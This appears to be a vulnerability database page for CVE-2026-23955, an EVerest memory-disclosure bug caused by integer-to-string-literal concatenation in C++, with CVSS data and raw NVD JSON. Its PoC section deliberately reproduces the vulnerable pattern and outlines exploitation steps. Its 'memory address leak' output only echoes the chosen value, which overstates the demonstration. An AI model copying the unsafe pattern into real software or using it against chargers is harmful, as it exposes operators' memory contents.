Security Vulnerability Report
CVE-2026-23955 CVSS 4.2 MEDIUM

CVE-2026-23955

Published: 2026-01-21 20:16:13
Last Modified: 2026-02-06 21:21:59

Description

EVerest is an EV charging software stack. Prior to version 2025.9.0, in several places, integer values are concatenated to string literals when throwing errors. In C++ this results in pointer arithmetic rather than printing the integer value as expected, which is what most interpreted languages would do. A malicious operator can use this to read unintended memory regions, including the heap and the stack. Version 2025.9.0 fixes the issue.

CVSS Details

CVSS Score: 4.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:* - VULNERABLE
EVerest < 2025.9.0
everest-core < 2025.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
cpp
// CVE-2026-23955 PoC - Information Disclosure via Integer-String Concatenation
// This PoC demonstrates the vulnerability in EVerest's error handling
#include <cstdint>
#include <iostream>
#include <stdexcept>
#include <string>

// Vulnerable code pattern (before fix)
void vulnerable_error_handler(int error_code) {
    // This causes pointer arithmetic instead of string concatenation.
    // In C++, "Error: " + error_code interprets error_code as a pointer offset:
    // the literal decays to const char* and is advanced by error_code bytes,
    // and std::string then copies from that address up to the next NUL byte.
    // Any offset outside the literal is undefined behaviour and may crash.
    std::string msg = "Error: " + error_code;
    throw std::runtime_error(msg);
}

// Safe version (after fix)
void safe_error_handler(int error_code) {
    // Correct way: convert integer to string first
    std::string msg = "Error: " + std::to_string(error_code);
    throw std::runtime_error(msg);
}

// Exploitation scenario:
// 1. Attacker needs high privilege access to EV charging system
// 2. Trigger error conditions with controlled integer values
// 3. Read leaked memory contents from stack/heap
// 4. Extract sensitive data from leaked memory regions

int main() {
    std::cout << "CVE-2026-23955 Information Disclosure PoC" << std::endl;
    std::cout << "Target: EVerest EV Charging Software < 2025.9.0" << std::endl;

    // Simulate triggering vulnerable code path
    int malicious_code = 0x41414141; // Controlled value

    try {
        vulnerable_error_handler(malicious_code);
    } catch (const std::exception& e) {
        std::cout << "Exception: " << e.what() << std::endl;
        // Widen through uintptr_t so the int-to-pointer cast is well-formed
        // on 64-bit targets; this prints the controlled value as a pointer.
        std::cout << "Memory address leak: "
                  << reinterpret_cast<void*>(static_cast<std::uintptr_t>(malicious_code))
                  << std::endl;
    }
    return 0;
}

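References

https://github.com/EVerest/everest-core/security/advisories/GHSA-px57-jx97-hrff (Vendor Advisory, Exploit)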

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23955", "sourceIdentifier": "[email protected]", "published": "2026-01-21T20:16:12.517", "lastModified": "2026-02-06T21:21:59.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EVerest is an EV charging software stack. Prior to version 2025.9.0, in several places, integer values are concatenated to literal strings when throwing errors. This results in pointers arithmetic instead of printing the integer value as expected, like most of interpreted languages. This can be used by malicious operator to read unintended memory regions, including the heap and the stack. Version 2025.9.0 fixes the issue."}, {"lang": "es", "value": "EVerest es una pila de software de carga de VE. Antes de la versión 2025.9.0, en varios lugares, los valores enteros se concatenan a cadenas literales al lanzar errores. Esto resulta en aritmética de punteros en lugar de imprimir el valor entero como se espera, como la mayoría de los lenguajes interpretados. Esto puede ser utilizado por un operador malicioso para leer regiones de memoria no intencionadas, incluyendo el montón y la pila. La versión 2025.9.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1046"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.9.0", "matchCriteriaId": "B1D746C7-49D6-43DE-90B2-C79F58ADB9B7"}]}]}], "references": [{"url": "https://github.com/EVerest/everest-core/security/advisories/GHSA-px57-jx97-hrff", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}